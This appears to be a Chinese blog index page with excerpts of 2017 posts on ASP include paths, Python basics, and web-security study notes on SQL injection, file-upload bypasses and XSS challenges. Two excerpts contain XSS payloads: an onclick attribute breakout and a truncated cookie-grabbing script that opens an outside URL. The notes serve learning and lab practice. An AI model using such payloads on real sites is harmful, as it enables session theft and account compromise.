摘要: ASP不能用 '..' 表示父目录的提示一般出现在Windows2003架设的IIS上,因为鉴于安全的原因,IIS6不推荐使用父目录。 一般ASP使用父目录的文件,比如conn.asp,一般是用下面的代码: 1 <!--#include file="../conn.asp"--> <!--#incl 阅读全文
posted @ 2017-04-28 17:27 黑暗中的小郎君 阅读(166) 评论(0) 推荐(0) 编辑
摘要: 函数式变成:支持高阶函数(接受函数为参数的函数),支持闭包 1.python把函数作为参数import mathdef add(x, y, f): return f(x) + f(y)print add(25, 9, math.sqrt) //这里引用的,math函数库里的求平方根函数sqrt() 阅读全文
posted @ 2017-04-12 14:14 黑暗中的小郎君 阅读(203) 评论(0) 推荐(0) 编辑
摘要: 1., 连接符,返回的是多个值,返回逗号两边的值 + 连接符,返回一个值 2.print 后面的值必须先定义再调用 3.'''....''' 代表多行表示字符串,省略\n 4.r 表示后面的内容是字符串,省去\的转义 5.u(u必须紧靠语句) 对字符串进行Unicode编码# -*- coding: 阅读全文
posted @ 2017-03-27 09:32 黑暗中的小郎君 阅读(455) 评论(0) 推荐(0) 编辑
摘要: 基本概念: SQL注入:在与数据库交互的地方,加入SQL语句来获得数据库信息,绕过某些登录,执行系统命令等的操作 例如:利用万能密码登录后台,添加用户,执行系统命令,获取密码等 上传:对用户上传文件类型判断失误,导致上传攻击者的脚本文件,从而对网站进行攻击 上传需要绕过:1.客户端js脚本检测:刚选 阅读全文
posted @ 2017-03-26 21:01 黑暗中的小郎君 阅读(500) 评论(0) 推荐(0) 编辑
摘要: 地址:http://118.89.29.193:8080/level1.php (总共20关) 1.当<script>alert(1)</script>被拦截时,如果在value值内的话,尝试value="" onclick='javascript:alert(1)'> (注意:需要触发才可以执行j 阅读全文
posted @ 2017-03-26 17:04 黑暗中的小郎君 阅读(279) 评论(0) 推荐(0) 编辑
摘要: 1.不同的浏览器对js脚本的过滤措施不同,IE可以执行的,搜狗和Chrome提示Token contains reflects xss啥的 搜狗浏览器: IE: 2.获取cookie ...............class=<script>window.open("http://www.cnblo 阅读全文
posted @ 2017-03-26 17:03 黑暗中的小郎君 阅读(179) 评论(0) 推荐(0) 编辑